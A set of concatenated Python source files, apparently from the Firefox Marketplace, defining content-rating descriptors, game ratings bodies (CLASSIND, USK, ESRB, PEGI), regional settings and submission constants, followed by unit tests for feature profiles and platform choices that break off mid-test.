    'USK_VIOLENCE': {'name': _lazy('Violence')},
    # New USK.
    'USK_ABSTRACT_VIOLENCE': {'name': _lazy('Abstract Violence')},
    'USK_ALCOHOL': {'name': _lazy('Alcohol Use')},
    'USK_DRUG_USE': {'name': _lazy('Drug Use')},
    'USK_EXPLICIT_VIOLENCE': {'name': _lazy('Explicit Violence')},
    'USK_HORROR': {'name': _lazy('Horror')},
    'USK_NUDITY': {'name': _lazy('Nudity')},
    'USK_SEX_VIOLENCE': {'name': _lazy('Sexual Violence')},
    'USK_SEX_VIOLENCE_REF': {'name': _lazy('Sexual Violence Reference')},
    'USK_SEX_REF': {'name': _lazy('Sexual References')},
    'USK_SOME_SCARES': {'name': _lazy('Rare Scares')},
    'USK_SOME_SWEARING': {'name': _lazy('Occasional Swearing')},
    'USK_TOBACCO': {'name': _lazy('Tobacco Use')},
}
########NEW FILE########
__FILENAME__ = ratinginteractives
from ordereddict import OrderedDict
from tower import ugettext_lazy as _lazy
# WARNING: When adding a new interactive element here also include a migration.
#
# These are used to dynamically generate the field list for the
# RatingInteractives django model in mkt.webapps.models.
# NOTE(review): keys appear to mirror the PEGI_* interactive descriptors in
# RATING_DESCS (e.g. USERS_INTERACT / PEGI_USERS_INTERACT) — confirm they
# must stay in sync.
RATING_INTERACTIVES = OrderedDict([
    ('USERS_INTERACT', {
        'name': _lazy('Users Interact'),
    }),
    ('SHARES_INFO', {
        'name': _lazy('Shares Info'),
    }),
    ('SHARES_LOCATION', {
        'name': _lazy('Shares Location'),
    }),
    ('DIGITAL_PURCHASES', {
        'name': _lazy('Digital Purchases'),
    }),
])
########NEW FILE########
__FILENAME__ = ratingsbodies
# -*- coding: utf-8 -*-
from tower import ugettext_lazy as _lazy
# Shared rating display names, consumed by dehydrate_rating() and by the
# GENERIC_RP / USK_REJECTED special-case ratings below.
NAME_GENERAL = _lazy('For all ages')
# L10n: %d is the age in years. For ages %d and higher.
NAME_LAZY = _lazy('For ages %d+')  # Interpolated with the age after access.
NAME_REJECTED = _lazy(u'Rating Rejected')
NAME_PENDING = _lazy(u'Rating Pending')
class RATING(object):
    """
    Content rating.

    iarc_name -- how IARC names the rating, to talk with IARC.
    age -- minimum age of the rating's age recommendation.
    name -- how we name the rating, for translated display on all pages.
    label -- for CSS classes, to create icons.
    adult -- True for adults-only ratings (e.g. 18+).
    """
    age = None
    # name and label are filled in dynamically by dehydrate_rating() when a
    # subclass leaves them as None.
    name = None
    label = None
    adult = False
class RATING_BODY(object):
    """
    Content rating body.

    iarc_name -- how IARC names the ratings body, to talk with IARC.
    ratings -- list of RATINGs associated with this body.
    name -- for general translated display on all pages.
    label -- for CSS classes, to create icons.
    description -- for general translated display on all pages.
    full_name -- in case we ever want to display the full translated name.
    url -- in case we ever want to link to the ratings body page for more info.
    """
    # Computed from iarc_name by dehydrate_ratings_body() when left as None.
    label = None
# CLASSIND (Brazil) ratings, ordered by minimum age.
class CLASSIND_L(RATING):
    id = 0
    age = 0
    iarc_name = '0+'
class CLASSIND_10(RATING):
    id = 1
    age = 10
    iarc_name = '10+'
class CLASSIND_12(RATING):
    id = 2
    age = 12
    iarc_name = '12+'
class CLASSIND_14(RATING):
    id = 3
    age = 14
    iarc_name = '14+'
class CLASSIND_16(RATING):
    id = 4
    age = 16
    iarc_name = '16+'
class CLASSIND_18(RATING):
    id = 5
    age = 18
    iarc_name = '18+'
    adult = True
class CLASSIND(RATING_BODY):
    """
    The Brazilian game ratings body (aka. DEJUS, DJCTQ).
    """
    id = 0
    iarc_name = 'CLASSIND'
    ratings = (CLASSIND_L, CLASSIND_10, CLASSIND_12, CLASSIND_14, CLASSIND_16,
               CLASSIND_18)
    name = 'CLASSIND'
    description = _lazy(u'Brazil')
    full_name = _lazy(u'Department of Justice, Rating, Titles and '
                      u'Qualification')
    url = ('http://portal.mj.gov.br/classificacao/data/Pages/'
           'MJ6BC270E8PTBRNN.htm')
# Generic ratings body ratings, ordered by minimum age.
class GENERIC_3(RATING):
    id = 0
    age = 3
    iarc_name = '3+'
class GENERIC_7(RATING):
    id = 1
    age = 7
    iarc_name = '7+'
class GENERIC_12(RATING):
    id = 2
    age = 12
    iarc_name = '12+'
class GENERIC_16(RATING):
    id = 3
    age = 16
    iarc_name = '16+'
class GENERIC_18(RATING):
    id = 4
    age = 18
    iarc_name = '18+'
    adult = True
# "Rating Pending": has no age, so name/label are set explicitly.
class GENERIC_RP(RATING):
    id = 5
    iarc_name = 'RP'
    label = 'pending'
    name = NAME_PENDING
class GENERIC(RATING_BODY):
    """
    The generic game ratings body (used in Germany, for example).
    """
    id = 1
    iarc_name = 'Generic'
    ratings = (GENERIC_3, GENERIC_7, GENERIC_12, GENERIC_16, GENERIC_18,
               GENERIC_RP)
    name = _lazy('Generic')
    description = ''  # No comment.
    full_name = _lazy(u'Generic')
# USK (Germany) ratings, ordered by minimum age.
class USK_0(RATING):
    id = 0
    age = 0
    iarc_name = '0+'
class USK_6(RATING):
    id = 1
    age = 6
    iarc_name = '6+'
class USK_12(RATING):
    id = 2
    age = 12
    iarc_name = '12+'
class USK_16(RATING):
    id = 3
    age = 16
    iarc_name = '16+'
class USK_18(RATING):
    id = 4
    age = 18
    iarc_name = '18+'
    adult = True
# Refused ratings have no age, so name/label are set explicitly.
class USK_REJECTED(RATING):
    id = 5
    iarc_name = 'Rating Refused'
    label = 'rating-refused'
    name = NAME_REJECTED
class USK(RATING_BODY):
    """
    The organization responsible for game ratings in Germany
    (aka. Unterhaltungssoftware Selbstkontrolle).
    """
    id = 2
    iarc_name = 'USK'
    ratings = (USK_0, USK_6, USK_12, USK_16, USK_18, USK_REJECTED)
    name = 'USK'
    description = _lazy(u'Germany')
    full_name = _lazy(u'Entertainment Software Self-Regulation Body')
    url = 'http://www.usk.de/en/'
# ESRB (Americas, except Brazil) ratings, ordered by minimum age.
class ESRB_E(RATING):
    """Everybody."""
    id = 0
    age = 0
    iarc_name = 'Everyone'
    name = _lazy('Everyone')
class ESRB_10(RATING):
    id = 1
    age = 10
    iarc_name = 'Everyone 10+'
    name = _lazy('Everyone 10+')  # L10n: `10+` is age ten and over.
class ESRB_T(RATING):
    id = 2
    age = 13
    iarc_name = 'Teen'
    name = _lazy('Teen')
class ESRB_M(RATING):
    id = 3
    age = 17
    iarc_name = 'Mature 17+'
    name = _lazy('Mature 17+')  # L10n: `17+` is age seventeen and over.
class ESRB_A(RATING):
    id = 4
    age = 18
    iarc_name = 'Adults Only'
    name = _lazy('Adults Only 18+')  # L10n: `18+` is age eighteen and over.
    adult = True
class ESRB(RATING_BODY):
    """
    The North American game ratings body (i.e. USA, Canada).
    """
    id = 3
    iarc_name = 'ESRB'
    ratings = (ESRB_E, ESRB_10, ESRB_T, ESRB_M, ESRB_A)
    name = 'ESRB'
    # L10n: North and South American, but not Brazil.
    description = _lazy(u'All Americas except Brazil')
    full_name = _lazy(u'Entertainment Software Rating Board')
    url = 'http://esrb.org'
# PEGI (Europe) ratings, ordered by minimum age.
class PEGI_3(RATING):
    id = 0
    age = 3
    iarc_name = '3+'
class PEGI_7(RATING):
    id = 1
    age = 7
    iarc_name = '7+'
class PEGI_12(RATING):
    id = 2
    age = 12
    iarc_name = '12+'
class PEGI_16(RATING):
    id = 3
    age = 16
    iarc_name = '16+'
class PEGI_18(RATING):
    id = 4
    age = 18
    iarc_name = '18+'
    adult = True
class PEGI(RATING_BODY):
    """
    The European game ratings body (i.e. UK, Poland, Spain).
    """
    id = 4
    iarc_name = 'PEGI'
    ratings = (PEGI_3, PEGI_7, PEGI_12, PEGI_16, PEGI_18)
    name = 'PEGI'
    description = _lazy(u'Europe')
    full_name = _lazy(u'Pan European Game Information')
    url = 'http://www.pegi.info'
# Lookup of ratings bodies by their stable numeric id.
RATINGS_BODIES = {
    CLASSIND.id: CLASSIND,
    GENERIC.id: GENERIC,
    USK.id: USK,
    ESRB.id: ESRB,
    PEGI.id: PEGI,
}
# Attach ratings bodies to ratings.
for rb in RATINGS_BODIES.values():
    for r in rb.ratings:
        r.ratingsbody = rb
# Flat list of every body, ignoring waffle state (cf. ALL_RATINGS below).
ALL_RATINGS_BODIES = [CLASSIND, GENERIC, USK, ESRB, PEGI]
def ALL_RATINGS():
    """
    Return the flat list of ratings from every enabled body: CLASSIND and
    GENERIC are always included, the rest only when the 'iarc' waffle
    switch is active.
    """
    import waffle
    ratings = []
    for body in RATINGS_BODIES.values():
        if body in (CLASSIND, GENERIC) or waffle.switch_is_active('iarc'):
            ratings.extend(body.ratings)
    return ratings
def RATINGS_BY_NAME():
    """
    Create a list of tuples (choices) after we know the locale since this
    attempts to concatenate two lazy translations in constants file.
    """
    import waffle
    all_ratings = ALL_RATINGS()
    choices = []
    for body in RATINGS_BODIES.values():
        if not (body in (CLASSIND, GENERIC) or
                waffle.switch_is_active('iarc')):
            continue
        for rating in body.ratings:
            label = u'%s - %s' % (body.name, dehydrate_rating(rating).name)
            choices.append((all_ratings.index(rating), label))
    return choices
def slugify_iarc_name(obj):
    """
    Convert a ratings body's or rating's `iarc_name` into a slug-like
    label (e.g. "Rating Refused" becomes "rating-refused").
    """
    return '-'.join(obj.iarc_name.split(' ')).lower()
def dehydrate_rating(rating_class):
    """
    Returns a rating with translated fields attached and with fields that are
    easily created dynamically.

    Fixes the label fallback: the previous `str(rating.age) or
    slugify_iarc_name(rating)` could never fall through to the slug,
    because `str(None)` is the truthy string 'None'.
    """
    rating = rating_class()
    if rating.label is None:
        # str(None) is truthy ('None'), so the age must be checked
        # explicitly for the slug fallback to ever apply.
        if rating.age is None:
            rating.label = slugify_iarc_name(rating)
        else:
            rating.label = str(rating.age)
    if rating.name is None:
        if rating.age == 0:
            rating.name = unicode(NAME_GENERAL)
        else:
            # NAME_LAZY contains a %d placeholder for the age.
            rating.name = unicode(NAME_LAZY) % rating.age
    # Force any remaining lazy translation to a concrete unicode string.
    rating.name = unicode(rating.name)
    return rating
def dehydrate_ratings_body(body_class):
    """Returns a ratings body instance with translated fields attached."""
    body = body_class()
    if body.label is None:
        body.label = slugify_iarc_name(body)
    # Force the lazy translations to concrete unicode strings.
    for attr in ('name', 'description'):
        setattr(body, attr, unicode(getattr(body, attr)))
    return body
def pth(path):
    """Prepend the ratings icon root directory to `path`."""
    return ''.join(['img/icons/ratings/', path])
# Icon paths (relative to the static image root, see pth() above) for
# ratings, descriptors, and interactive elements.
IARC_ICONS = {
    'ratings': {
        # The keys are ratings' labels (as produced by dehydrate_rating:
        # the stringified age, or the explicit label for special ratings).
        'classind': {
            '0': pth('CLASSIND_L.png'),
            '10': pth('CLASSIND_10.png'),
            '12': pth('CLASSIND_12.png'),
            '14': pth('CLASSIND_14.png'),
            '16': pth('CLASSIND_16.png'),
            '18': pth('CLASSIND_18.png'),
        },
        'esrb': {
            '0': pth('ESRB_e.png'),
            '10': pth('ESRB_e10.png'),
            '13': pth('ESRB_t.png'),
            '17': pth('ESRB_m.png'),
            '18': pth('ESRB_ao.png'),
        },
        'generic': {
            '3': pth('generic_3.png'),
            '7': pth('generic_7.png'),
            '12': pth('generic_12.png'),
            '16': pth('generic_16.png'),
            '18': pth('generic_18.png'),
            'pending': pth('generic_rp.png'),
        },
        'pegi': {
            '3': pth('pegi_3.png'),
            '7': pth('pegi_7.png'),
            '12': pth('pegi_12.png'),
            '16': pth('pegi_16.png'),
            '18': pth('pegi_18.png'),
        },
        'usk': {
            '0': pth('USK_0.png'),
            '6': pth('USK_6.png'),
            '12': pth('USK_12.png'),
            '16': pth('USK_16.png'),
            '18': pth('USK_18.png'),
            'rating-refused': pth('USK_RR.png')
        }
    },
    'descriptors': {
        # The keys are descriptors' keys lower-cased and 's/_/-/g'.
        'pegi': {
            'discrimination': pth('descriptors/pegi_discrimination.png'),
            'drugs': pth('descriptors/pegi_drugs.png'),
            'gambling': pth('descriptors/pegi_gambling.png'),
            'lang': pth('descriptors/pegi_language.png'),
            'nudity': pth('descriptors/pegi_nudity.png'),
            'online': pth('descriptors/pegi_online.png'),
            'scary': pth('descriptors/pegi_fear.png'),
            'sex-content': pth('descriptors/pegi_sex.png'),
            'violence': pth('descriptors/pegi_violence.png'),
            'digital-purchases': pth(
                'descriptors/pegi_inapp_purchase_option.png'),
            'shares-info': pth(
                'descriptors/pegi_personal_data_sharing.png'),
            'shares-location': pth(
                'descriptors/pegi_location_data_sharing.png'),
            'users-interact': pth(
                'descriptors/pegi_social_interaction_functionality.png'),
        }
    },
    'interactive_elements': {
        # The keys are interactives' keys lower-cased and 's/_/-/g'.
        'shares-info': pth('interactives/ESRB_shares-info_small.png'),
        'shares-location': pth('interactives/ESRB_shares-location_small.png'),
        'users-interact': pth('interactives/ESRB_users-interact_small.png'),
        'digital-purchases': pth(
            'interactives/ESRB_digital-purchases_small.png'),
    }
}
########NEW FILE########
__FILENAME__ = regions
import inspect
import sys
from tower import ugettext_lazy as _lazy
from mkt.constants import ratingsbodies
from mkt.constants.ratingsbodies import slugify_iarc_name
class REGION(object):
    """
    A region is like a country but more confusing.

    id::
        The primary key used to identify a region in the DB.

    name::
        The text that appears in the header and region selector menu.

    slug::
        The text that gets stored in the cookie or in ?region=<slug>.
        Use the ISO-3166 code please.

    mcc::
        Don't know what an ITU MCC is? They're useful for carrier billing.
        Read http://en.wikipedia.org/wiki/List_of_mobile_country_codes

    adolescent::
        With a mature region (meaning, it has a volume of useful data) we
        are able to calculate ratings and rankings independently. If a
        store is immature it will continue using the global popularity
        measure. If a store is mature it will use the smaller, more
        relevant set of data.

    weight::
        Determines sort order (after slug).

    special::
        Does this region need to be reviewed separately? That region is
        special.

    default_currency / default_language::
        Fallback currency and locale codes for the region.

    ratingsbody::
        The mkt.constants.ratingsbodies body used in this region, or None.
    """
    id = None
    name = slug = ''
    default_currency = 'USD'
    default_language = 'en-US'
    adolescent = True
    mcc = None
    weight = 0
    ratingsbody = None
    special = False
class RESTOFWORLD(REGION):
id = 1
name = _lazy(u'Rest of World')
slug = 'restofworld'
weight = -1
class US(REGION):
id = 2
name = _lazy(u'United States')
slug = 'us'
mcc = 310
weight = 1
ratingsbody = ratingsbodies.ESRB
# United Kingdom. Note: 'gb' is accepted as an alias for this slug via
# REGION_LOOKUP (bug 973883).
class UK(REGION):
    id = 4
    name = _lazy(u'United Kingdom')
    slug = 'uk'
    default_currency = 'GBP'
    mcc = 235
    ratingsbody = ratingsbodies.PEGI
# Brazil. adolescent=False: mature store with enough data for its own
# ratings/rankings (see REGION docstring).
class BR(REGION):
    id = 7
    name = _lazy(u'Brazil')
    slug = 'br'
    default_currency = 'BRL'
    default_language = 'pt-BR'
    mcc = 724
    ratingsbody = ratingsbodies.CLASSIND
    adolescent = False
# Spain (slug 'es'; class name differs from the usual ISO-code pattern).
class SPAIN(REGION):
    id = 8
    name = _lazy(u'Spain')
    slug = 'es'
    default_currency = 'EUR'
    default_language = 'es'
    mcc = 214
    ratingsbody = ratingsbodies.PEGI
# Colombia. adolescent=False: mature store (see REGION docstring).
class CO(REGION):
    id = 9
    name = _lazy(u'Colombia')
    slug = 'co'
    default_currency = 'COP'
    default_language = 'es'
    mcc = 732
    ratingsbody = ratingsbodies.ESRB
    adolescent = False
# Venezuela (prices in USD).
class VE(REGION):
    id = 10
    name = _lazy(u'Venezuela')
    slug = 've'
    default_currency = 'USD'
    default_language = 'es'
    mcc = 734
    ratingsbody = ratingsbodies.ESRB
# Poland.
class PL(REGION):
    id = 11
    name = _lazy(u'Poland')
    slug = 'pl'
    default_currency = 'PLN'
    default_language = 'pl'
    mcc = 260
    ratingsbody = ratingsbodies.PEGI
# Mexico. adolescent=False: mature store (see REGION docstring).
class MX(REGION):
    id = 12
    name = _lazy(u'Mexico')
    slug = 'mx'
    default_currency = 'MXN'
    default_language = 'es'
    mcc = 334
    ratingsbody = ratingsbodies.ESRB
    adolescent = False
# Hungary.
class HU(REGION):
    id = 13
    name = _lazy(u'Hungary')
    slug = 'hu'
    default_currency = 'HUF'
    default_language = 'hu'
    mcc = 216
    ratingsbody = ratingsbodies.PEGI
# Germany. Uses USK, not PEGI like most other European regions here.
class DE(REGION):
    id = 14
    name = _lazy(u'Germany')
    slug = 'de'
    default_currency = 'EUR'
    default_language = 'de'
    mcc = 262
    ratingsbody = ratingsbodies.USK
# Montenegro. No ratings body assigned.
class ME(REGION):
    id = 15
    name = _lazy(u'Montenegro')
    slug = 'me'
    default_currency = 'EUR'
    default_language = 'srp'
    mcc = 297
# Serbia. No ratings body assigned.
class RS(REGION):
    id = 16
    name = _lazy(u'Serbia')
    slug = 'rs'
    default_currency = 'RSD'
    default_language = 'sr'
    mcc = 220
# Greece.
class GR(REGION):
    id = 17
    name = _lazy(u'Greece')
    slug = 'gr'
    default_currency = 'EUR'
    default_language = 'el'
    mcc = 202
    ratingsbody = ratingsbodies.PEGI
# Peru.
class PE(REGION):
    id = 18
    name = _lazy(u'Peru')
    slug = 'pe'
    default_currency = 'PEN'
    default_language = 'es'
    mcc = 716
    ratingsbody = ratingsbodies.ESRB
# Uruguay.
class UY(REGION):
    id = 19
    name = _lazy(u'Uruguay')
    slug = 'uy'
    default_currency = 'UYU'
    default_language = 'es'
    mcc = 748
    ratingsbody = ratingsbodies.ESRB
# Argentina.
class AR(REGION):
    id = 20
    name = _lazy(u'Argentina')
    slug = 'ar'
    default_currency = 'ARS'
    default_language = 'es'
    mcc = 722
    ratingsbody = ratingsbodies.ESRB
# China. special=True: this region's content needs to be reviewed separately
# (see REGION docstring and SPECIAL_REGIONS below).
class CN(REGION):
    id = 21
    name = _lazy(u'China')
    slug = 'cn'
    default_currency = 'RMB'
    default_language = 'zh-CN'
    mcc = 460
    special = True
# Italy.
class IT(REGION):
    id = 22
    name = _lazy(u'Italy')
    slug = 'it'
    default_currency = 'EUR'
    default_language = 'it'
    mcc = 222
    ratingsbody = ratingsbodies.PEGI
# Chile.
class CL(REGION):
    id = 23
    name = _lazy(u'Chile')
    slug = 'cl'
    default_currency = 'CLP'
    default_language = 'es'
    mcc = 730
    ratingsbody = ratingsbodies.ESRB
# El Salvador (prices in USD).
class SV(REGION):
    id = 24
    name = _lazy(u'El Salvador')
    slug = 'sv'
    default_currency = 'USD'
    default_language = 'es'
    mcc = 706
    ratingsbody = ratingsbodies.ESRB
# Guatemala.
class GT(REGION):
    id = 25
    name = _lazy(u'Guatemala')
    slug = 'gt'
    default_currency = 'GTQ'
    default_language = 'es'
    mcc = 704
    ratingsbody = ratingsbodies.ESRB
# Ecuador (prices in USD).
class EC(REGION):
    id = 26
    name = _lazy(u'Ecuador')
    slug = 'ec'
    default_currency = 'USD'
    default_language = 'es'
    mcc = 740
    ratingsbody = ratingsbodies.ESRB
# Costa Rica.
class CR(REGION):
    id = 27
    name = _lazy(u'Costa Rica')
    slug = 'cr'
    default_currency = 'CRC'
    default_language = 'es'
    mcc = 712
    ratingsbody = ratingsbodies.ESRB
# Panama (prices in USD).
class PA(REGION):
    id = 28
    name = _lazy(u'Panama')
    slug = 'pa'
    default_currency = 'USD'
    default_language = 'es'
    mcc = 714
    ratingsbody = ratingsbodies.ESRB
# Nicaragua.
class NI(REGION):
    id = 29
    name = _lazy(u'Nicaragua')
    slug = 'ni'
    default_currency = 'NIO'
    default_language = 'es'
    mcc = 710
    ratingsbody = ratingsbodies.ESRB
# Create a list of (name, class) tuples for every region class defined in
# this module, ordered by slug:
#
#   [('ar', ...), ('br', ...), ..., ('restofworld', ...), ...]
#
# BUGFIX: the sort key used to be `getattr(x, 'slug', None)` where `x` is the
# (name, class) tuple yielded by inspect.getmembers() -- a tuple has no
# `slug` attribute, so every key was None and no real slug sort happened
# (the list simply kept getmembers()'s name order). Index into the tuple so
# the list is genuinely ordered by slug, as the REGION.weight docstring
# ("sort order (after slug)") expects.
DEFINED = sorted(inspect.getmembers(sys.modules[__name__], inspect.isclass),
                 key=lambda member: getattr(member[1], 'slug', None))

# (slug, class) choices, RESTOFWORLD first, then by descending weight
# (ties broken by slug thanks to the stable sort over DEFINED).
REGIONS_CHOICES = (
    [('restofworld', RESTOFWORLD)] +
    sorted([(v.slug, v) for k, v in DEFINED if v.id and v.weight > -1],
           key=lambda x: x[1].weight, reverse=True)
)

# All real regions (weight > -1 excludes RESTOFWORLD), ordered by slug.
BY_SLUG = sorted([v for k, v in DEFINED if v.id and v.weight > -1],
                 key=lambda v: v.slug)

REGIONS_CHOICES_SLUG = ([('restofworld', RESTOFWORLD)] +
                        [(v.slug, v) for v in BY_SLUG])
REGIONS_CHOICES_ID = ([(RESTOFWORLD.id, RESTOFWORLD)] +
                      [(v.id, v) for v in BY_SLUG])
# Rest of World last here so we can display it after all the other regions.
REGIONS_CHOICES_NAME = ([(v.id, v.name) for v in BY_SLUG] +
                        [(RESTOFWORLD.id, RESTOFWORLD.name)])

REGIONS_DICT = dict(REGIONS_CHOICES)
REGIONS_CHOICES_ID_DICT = dict(REGIONS_CHOICES_ID)
# Provide a dict for looking up the region by slug that includes aliases:
# - "worldwide" is an alias for RESTOFWORLD (bug 940561).
# - "gb" is an alias for UK (bug 973883).
REGION_LOOKUP = dict(REGIONS_DICT.items() +
                     [('worldwide', RESTOFWORLD), ('gb', UK)])
ALL_REGIONS = frozenset(REGIONS_DICT.values())
ALL_REGION_IDS = sorted(REGIONS_CHOICES_ID_DICT.keys())

SPECIAL_REGIONS = [x for x in BY_SLUG if x.special]
SPECIAL_REGION_IDS = sorted(x.id for x in SPECIAL_REGIONS)

# Regions not including restofworld (RESTOFWORLD.id == 1 is the smallest id,
# so slicing off the first sorted id drops it).
REGION_IDS = sorted(REGIONS_CHOICES_ID_DICT.keys())[1:]

GENERIC_RATING_REGION_SLUG = 'generic'
def ALL_REGIONS_WITH_CONTENT_RATINGS():
    """Return the regions that carry a content-ratings body."""
    import waffle
    if not waffle.switch_is_active('iarc'):
        # Without the IARC switch, only Brazil and Germany require ratings.
        return [BR, DE]
    return [region for region in ALL_REGIONS if region.ratingsbody]
def ALL_REGIONS_WITHOUT_CONTENT_RATINGS():
    """
    Regions without ratings bodies and fallback to the GENERIC rating body.
    """
    # Everything minus the rated regions.
    return set(ALL_REGIONS).difference(ALL_REGIONS_WITH_CONTENT_RATINGS())
def REGION_TO_RATINGS_BODY():
    """
    Return a map of region slugs to ratings body labels for use in
    serializers and to send to Fireplace.
    e.g. {'us': 'esrb', 'mx': 'esrb', 'es': 'pegi', 'br': 'classind'}.
    """
    import waffle

    # Build the mapping: each rated region gets its body's slug, anything
    # without a body falls back to the generic label.
    region_to_bodies = {}
    for region in ALL_REGIONS_WITH_CONTENT_RATINGS():
        if region.ratingsbody:
            label = slugify_iarc_name(region.ratingsbody)
        else:
            label = GENERIC_RATING_REGION_SLUG
        region_to_bodies[region.slug] = label

    # Edge case: without the IARC switch, Germany uses the generic body.
    if not waffle.switch_is_active('iarc'):
        region_to_bodies['de'] = GENERIC_RATING_REGION_SLUG
    return region_to_bodies
def REGIONS_CHOICES_SORTED_BY_NAME():
    """Get the region choices and sort by name.
    Requires a function due to localisation.
    """
    # Avoid circular import.
    from mkt.regions.utils import remove_accents

    def sort_key(region):
        # Accent-insensitive sort on the localised name.
        return remove_accents(unicode(region.name))

    regions = [v for k, v in DEFINED if v.id and v.weight > -1]
    regions.sort(key=sort_key)
    choices = [(region.id, region.name) for region in regions]
    # Rest of World always comes last.
    choices.append((RESTOFWORLD.id, RESTOFWORLD.name))
    return choices
########NEW FILE########
__FILENAME__ = reviewers
from tower import ugettext_lazy as _
# App type for reviewer app queue filters.
APP_TYPE_HOSTED = 0
APP_TYPE_PACKAGED = 1
# Localised labels keyed by app type, for display in the review queues.
APP_TYPES = {
    APP_TYPE_HOSTED: _('Hosted'),
    APP_TYPE_PACKAGED: _('Packaged')
}
########NEW FILE########
__FILENAME__ = submit
from tower import ugettext_lazy as _
# (step slug, localised title) pairs for the app submission flow, in order.
APP_STEPS = [
    ('terms', _('Agreement')),
    ('manifest', _('Submit')),
    ('details', _('Details')),
    ('done', _('Done!')),
    # ('next_steps', _('Next Steps')),
]
# Step slug -> title lookup derived from APP_STEPS.
APP_STEPS_TITLE = dict(APP_STEPS)

# Preview sizes in the format (width, height, type)
APP_PREVIEW_MINIMUMS = (320, 480)
APP_PREVIEW_SIZES = [
    (100, 150, 'mobile'),  # Thumbnail size.
    (700, 1050, 'full'),  # Because it's proportional, that's why.
]

MAX_PACKAGED_APP_SIZE = 100 * 1024 * 1024  # 100MB
########NEW FILE########
__FILENAME__ = test_features
import itertools
from ordereddict import OrderedDict
from django.conf import settings
import mock
from nose.tools import eq_, ok_
import amo.tests
from mkt.constants.features import APP_FEATURES, FeatureProfile
# Freeze the feature dict to exactly 45 entries so the bitfield values and
# '<hex>.45.<version>' signatures asserted below stay stable even if new
# features are added upstream.
APP_FEATURES = OrderedDict(itertools.islice(APP_FEATURES.iteritems(), 45))
@mock.patch('mkt.constants.features.APP_FEATURES', APP_FEATURES)
class TestFeatureProfile(amo.tests.TestCase):
    """Round-trip tests for FeatureProfile int/signature conversions."""

    def setUp(self):
        # Bitfield with the bits for self.truths set, and its expected
        # '<hex>.<count>.<version>' signature form.
        self.features = 0x110022000000
        self.signature = '110022000000.45.%s' % settings.APP_FEATURES_VERSION
        self.truths = ['apps', 'proximity', 'light_events', 'vibrate']

    def test_init(self):
        profile = FeatureProfile(**dict((f, True) for f in self.truths))
        eq_(profile.to_signature(), self.signature)
        eq_(profile.to_int(), self.features)

    def _test_profile(self, profile):
        # Shared assertions: int/signature round-trip plus per-feature flags.
        eq_(profile.to_int(), self.features)
        eq_(profile.to_signature(), self.signature)
        for k, v in profile.iteritems():
            if v:
                ok_(k in self.truths, '%s not in truths' % k)
            else:
                ok_(k not in self.truths, '%s is in truths' % k)

    def test_from_int(self):
        profile = FeatureProfile.from_int(self.features)
        self._test_profile(profile)

    def test_from_int_all_false(self):
        # Zero bitfield means no features enabled at all.
        self.features = 0
        self.signature = '0.45.%s' % settings.APP_FEATURES_VERSION
        self.truths = []
        self.test_from_int()

    def test_from_signature(self):
        profile = FeatureProfile.from_signature(self.signature)
        self._test_profile(profile)

    def _test_kwargs(self, prefix):
        # to_kwargs() should only emit False entries, each prefixed.
        profile = FeatureProfile.from_int(self.features)
        kwargs = profile.to_kwargs(prefix=prefix)
        ok_(all([k.startswith(prefix) for k in kwargs.keys()]))
        eq_(kwargs.values().count(False), bin(self.features)[2:].count('0'))
        eq_(len(kwargs.values()), len(APP_FEATURES) - len(self.truths))

    def test_to_kwargs(self):
        self._test_kwargs('')
        self._test_kwargs('prefix_')
########NEW FILE########
__FILENAME__ = test_platforms
from django.test.client import RequestFactory
from nose.tools import eq_
from tower import ugettext as _
import amo.tests
from mkt.constants.platforms import FREE_PLATFORMS, PAID_PLATFORMS
class TestPlatforms(amo.tests.TestCase):
    """Tests for the FREE_PLATFORMS / PAID_PLATFORMS choice builders,
    exercising the waffle flags that gate packaged/paid Android and
    desktop support."""

    def test_free_platforms_default(self):
        # With no request and no flags, every free platform is offered.
        platforms = FREE_PLATFORMS()
        expected = (
            ('free-firefoxos', _('Firefox OS')),
            ('free-desktop', _('Firefox for Desktop')),
            ('free-android-mobile', _('Firefox Mobile')),
            ('free-android-tablet', _('Firefox Tablet')),
        )
        eq_(platforms, expected)

    def test_free_platforms_pkg_waffle_off(self):
        # Packaged apps default to Firefox OS only.
        platforms = FREE_PLATFORMS(request=RequestFactory(),
                                   is_packaged=True)
        expected = (
            ('free-firefoxos', _('Firefox OS')),
        )
        eq_(platforms, expected)

    def test_free_platforms_pkg_desktop_waffle_on(self):
        # 'desktop-packaged' flag adds the desktop choice for packaged apps.
        self.create_flag('desktop-packaged')
        platforms = FREE_PLATFORMS(request=RequestFactory(),
                                   is_packaged=True)
        expected = (
            ('free-firefoxos', _('Firefox OS')),
            ('free-desktop', _('Firefox for Desktop')),
        )
        eq_(platforms, expected)

    def test_free_platforms_pkg_android_waffle_on(self):
        # 'android-packaged' flag adds the Android choices for packaged apps.
        self.create_flag('android-packaged')
        platforms = FREE_PLATFORMS(request=RequestFactory(),
                                   is_packaged=True)
        expected = (
            ('free-firefoxos', _('Firefox OS')),
            ('free-android-mobile', _('Firefox Mobile')),
            ('free-android-tablet', _('Firefox Tablet')),
        )
        eq_(platforms, expected)

    def test_free_platforms_pkg_android_and_desktop_waffle_on(self):
        # Both flags together restore the full free platform list.
        self.create_flag('android-packaged')
        self.create_flag('desktop-packaged')
        platforms = FREE_PLATFORMS(request=RequestFactory(),
                                   is_packaged=True)
        expected = (
            ('free-firefoxos', _('Firefox OS')),
            ('free-desktop', _('Firefox for Desktop')),
            ('free-android-mobile', _('Firefox Mobile')),
            ('free-android-tablet', _('Firefox Tablet')),
        )
        eq_(platforms, expected)

    def test_paid_platforms_default(self):
        # Paid apps are Firefox OS only by default.
        platforms = PAID_PLATFORMS()
        expected = (
            ('paid-firefoxos', _('Firefox OS')),
        )
        eq_(platforms, expected)

    def test_paid_platforms_android_payments_waffle_on(self):
        # 'android-payments' flag enables paid Android platforms.
        self.create_flag('android-payments')
        platforms = PAID_PLATFORMS(request=RequestFactory())
        expected = (
            ('paid-firefoxos', _('Firefox OS')),
            ('paid-android-mobile', _('Firefox Mobile')),
            ('paid-android-tablet', _('Firefox Tablet')),
        )
        eq_(platforms, expected)

    def test_paid_platforms_pkg_with_android_payments_waffle_on(self):
        # Packaged + paid needs 'android-packaged' too; payments alone is
        # not enough to unlock Android.
        self.create_flag('android-payments')
        platforms = PAID_PLATFORMS(request=RequestFactory(),
                                   is_packaged=True)
        expected = (
            ('paid-firefoxos', _('Firefox OS')),
        )
        eq_(platforms, expected)

    def test_paid_platforms_pkg_with_android_payment_pkg_waffle_on(self):
        # Both flags together unlock paid packaged Android.
        self.create_flag('android-payments')
        self.create_flag('android-packaged')
